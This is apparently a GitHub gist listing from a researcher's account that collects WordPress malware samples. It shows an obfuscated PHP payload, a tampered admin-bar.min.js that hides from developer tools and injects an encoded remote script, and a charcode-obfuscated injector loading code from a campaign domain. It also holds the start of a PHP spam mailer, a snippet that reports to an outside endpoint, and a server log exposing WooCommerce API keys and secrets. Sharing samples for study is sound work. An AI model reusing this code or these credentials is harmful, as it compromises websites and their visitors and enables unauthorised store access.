Salvador Aguilar malwador
⚔️
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .++++++++++++++++++++++++++++#####+++++++++++++++++++++++++++++++++++++++++++####+++++++++++++++++++++++++++++++++++++++++++######+++++++++++++++++++++++++++++++++++++++++########+++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++######++++++++++++++++++++++++++++++++++++++++++###+++++++++++++++++++++++++++++++++++++++++++########+++++++++++++++++++++++++++++++++++++++++#######+++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++######++++++++++++++++++++++++++++++++++++++++++##+++++++++++++++++++++++++++++++++++++++++++++######+++++++++++++++++++++++++++++++++++++++++#######++++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++######+++++++++++++++++++++++++++++++++++++++++++##++++++++++++++++++++++++++++++++++++++++++++#######++++++++++++++++++++++++++++++++++++++++########+++++++++++++++++++++ | |
| +++++++++++++++++++++++++++++#####+++++++++++++++++++++++++++++++++++++++++++++#+++++++++++++++++++++++++++++++++++++++++++#######+++++++++++++++++++++++++++++++++++++++++#######++++++++++++++++++++++ | |
| +++++++++++++++++++ |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| +------------------------------------------------------------------------------+---------------------+--------------------+---------------+ | |
| | hook | next_run_gmt | next_run_relative | recurrence | | |
| +------------------------------------------------------------------------------+---------------------+--------------------+---------------+ | |
| | wp_privacy_delete_old_export_files | 2019-04-11 16:26:20 | now | 1 hour | | |
| | action_scheduler_run_queue | 2019-04-11 16:26:25 | now | 1 minute | | |
| | start_scheduled_trigger_cron | 2019-04-11 16:26:48 | now | Non-repeating | | |
| | crm_email_crawler | 2019-04-11 16:27:02 | now | 1 minute | | |
| | rsssl_pro_daily_hook |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| class Rst { const PLATFORM_UNKNOWN = 0; const PLATFORM_ANDROID = 1; const PLATFORM_APPLE = 2; const PLATFORM_LINUX = 3; const PLATFORM_WINDOWS = 4; private $contentData = '7P13XFNZFzeOnuQEEmpQQbAziqJiQUEDghJKAkhJFMFCsSNipwhKCzkJJDlEwF5Hx9HRsXdQEUINSBc7FqyAoKIgLck5d0V83vd55nl+n3vvH/e/y2e2J+e719577bXXXuW08VuWhaAIgtCgkCSC5CIDf2zk//1fExTjMXeMkRt61b/lUnyrf1sUsT7acmvUlnVRKzdZrl65efOWGMtVay2jYjdbrt9s6cELsNy0Zc3aaUZG+la/+hgU+ulwoLOo4l8lqp+sWPjzt7jiCxx9NtMrFv2qW/zz3OTnuc9ms5/HhetXR2jr/p945HMQxJdCQ0JWXQ35v3yjFAOKHoJYUhDk/gBmOwV+m2h/UAZmr/1NRRCdX23+dURMqD+FtaCVqq0W/CQ0+Vnx6/h/DgNjzaYgfO2PFRTE8sK/VbRTEAej/w+E/P/0B3z2Uv+fq6fFrI2PgaNmzK95aedK+08aS+BqWtSalTErEYQYOtAnYgFHK8p/0LHhv2kDZIiDdkw+5adsEOf/olNMi4qOWq3tWztXmDNyCY7z/ru//6/m+v//+//ZXwh7d237/YRfZzujK6c6TukbOCEMzcWE+n+0ufj0Rn/V449jg7bk6hcMih/5dDT+Ew+edca95H/Qu8eujvfJvvLF/M0rz98fXqc3n9j/b7WFNp+sb0w5PI8l//E/2o4zu1cU4b7zM5lkiltG/jHpxtHE/6Ixijrw+yPnwa88/jC8vX/e7bX3kBv/3VGA6YFJDy7cf03nHPxUkiORPW7/B8HR2ZwrI0WOKS1X2Lplqq9a6O/Raxr+q6Py90O2+hev6fxd5INsd5OO+m8K+HNoOD/c/OqroH |
malwador
/ gist:3079a3d4378a662f10c4e002d67e50e5
Created
July 20, 2019 01:52
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title>a:focus,.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title>a:hover,.wpb-js-composer .vc_tta.vc_general .vc_tta-tab>a:focus,.wpb-js-composer .vc_tta.vc_general .vc_tta-tab>a:hover{outline:0;text-decoration:none;box-shadow:none}.wpb-js-composer .vc_tta-container{margin-bottom:21.74px}.wpb-js-composer .vc_tta.vc_general{font-size:1em}.wpb-js-composer .vc_tta.vc_general .vc_tta-panels,.wpb-js-composer .vc_tta.vc_general .vc_tta-panels-container{box-sizing:border-box;position:relative}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel{display:block}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-heading{border:solid transparent;box-sizing:border-box;-webkit-transition:background .2s ease-in-out;transition:background .2s ease-in-out}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title{margin:0;line-height:1}.wpb-js-composer .vc_tta.vc_general .vc_tta-panel-title>a{background:0 0;display:block;padding:14px 20px;box-sizing:border-box;text-decoration:non |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| path: wp-includes/js/admin-bar.min.js | |
| (function(){"use strict";var e={open:!1,orientation:null},n=160,o=function(e,n){window.dispatchEvent(new CustomEvent("devtoolschange",{detail:{open:e,orientation:n}}))};setInterval(function(){var t=window.outerWidth-window.innerWidth>n,i=window.outerHeight-window.innerHeight>n,d=t?"vertical":"horizontal";i&&t||!(window.Firebug&&window.Firebug.chrome&&window.Firebug.chrome.isInitialized||t||i)?(e.open&&o(!1,null),e.open=!1,e.orientation=null):(e.open&&e.orientation===d||o(!0,d),e.open=!0,e.orientation=d)},500),"undefined"!=typeof module&&module.exports?module.exports=e:window.devtools=e})(),window.$sloaded=!1,setInterval(function(){if(!window.$sloaded&&!window.devtools.open&&"undefined"==typeof $s){var e=document.createElement(atob("c2NyaXB0"));e.src=atob("aHR0cHM6Ly96ZW5kZXNrLWNoYXJ0LmNvbS90b3AvYWNvLmpz"),e.type=atob("dGV4dC9qYXZhc2NyaXB0"),document.getElementsByTagName("head")[0].appendChild(e),window.$sloaded=!0}},500); | |
| "undefined"!=typeof jQuery?("undefined"==typeo |
malwador
/ gist:8b53206804ab0b09bfc6e2a1b294f941
Created
December 24, 2019 16:17
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| root@cTf-anrdesignkydex:/www/anrdesignkydex_812/logs# grep "HTTP/1.0 500" access.log* | |
| access.log:www.anrdesignkydexholster.com 35.171.19.91 [24/Dec/2019:05:23:09 +0000] GET "/wp-json/wc/v2/jilt/order-status?jilt_cart_token=f261d230-6fe0-4b79-b1c2-e129fb6031b8&consumer_key=ck_93a4501183e3ca075ac5c40261731ee9fe294536&consumer_secret=cs_7d916645df9e6c43b837cac11b3ef8a869827c4b" HTTP/1.0 500 "-" "WooCommerce API Client-Ruby/1.4.0" "-" 172.69.63.165 1 1 "/" "index" php "jilt_cart_token=f261d230-6fe0-4b79-b1c2-e129fb6031b8&consumer_key=ck_93a4501183e3ca075ac5c40261731ee9fe294536&consumer_secret=cs_7d916645df9e6c43b837cac11b3ef8a869827c4b" 0 - 91 647 0.910 0.908 | |
| access.log:www.anrdesignkydexholster.com 54.89.15.1 [24/Dec/2019:06:18:06 +0000] GET "/wp-json/wc/v2/jilt/order-status?jilt_cart_token=2d3c0bf5-1a27-4782-8c78-eb5ba8126f34&consumer_key=ck_93a4501183e3ca075ac5c40261731ee9fe294536&consumer_secret=cs_7d916645df9e6c43b837cac11b3ef8a869827c4b" HTTP/1.0 500 "-" "WooCommerce API Client-Ruby/1.4.0" "-" 172.69.62.32 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * PEAR, the PHP Extension and Application Repository | |
| * | |
| * PEAR class and PEAR_Error class | |
| * | |
| * PHP versions 4 and 5 | |
| * | |
| * LICENSE: This source file is subject to version 3.0 of the PHP license |
malwador
/ index.html
Last active
July 9, 2020 19:15
Samples for Malware Campaign using the letsparty3[.]ga domain
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,108,101,116,115,109,97,107,101,112,97,114,116,121,51,46,103,97,47,108,46,106,115,63,100,61,49);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| session_start(); | |
| error_reporting(0); | |
| set_time_limit(0); | |
| ini_set("memory_limit",-1); | |
| $leaf['version']="2.8"; | |
| $leaf['website']="leafmailer.pw"; | |
| $sessioncode = md5(__FILE__); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| if(!function_exists('do_rms_activation_task')) | |
| { | |
| /* ------------Register Config Variables------------ */ | |
| $GLOBALS['rms_report_to'] = 'https://managerly.org/wp-admin/admin-ajax.php'; | |
| $GLOBALS['rms_disclaimer_text'] = []; | |
| $GLOBALS['rms_ajax_del_request'] = false; |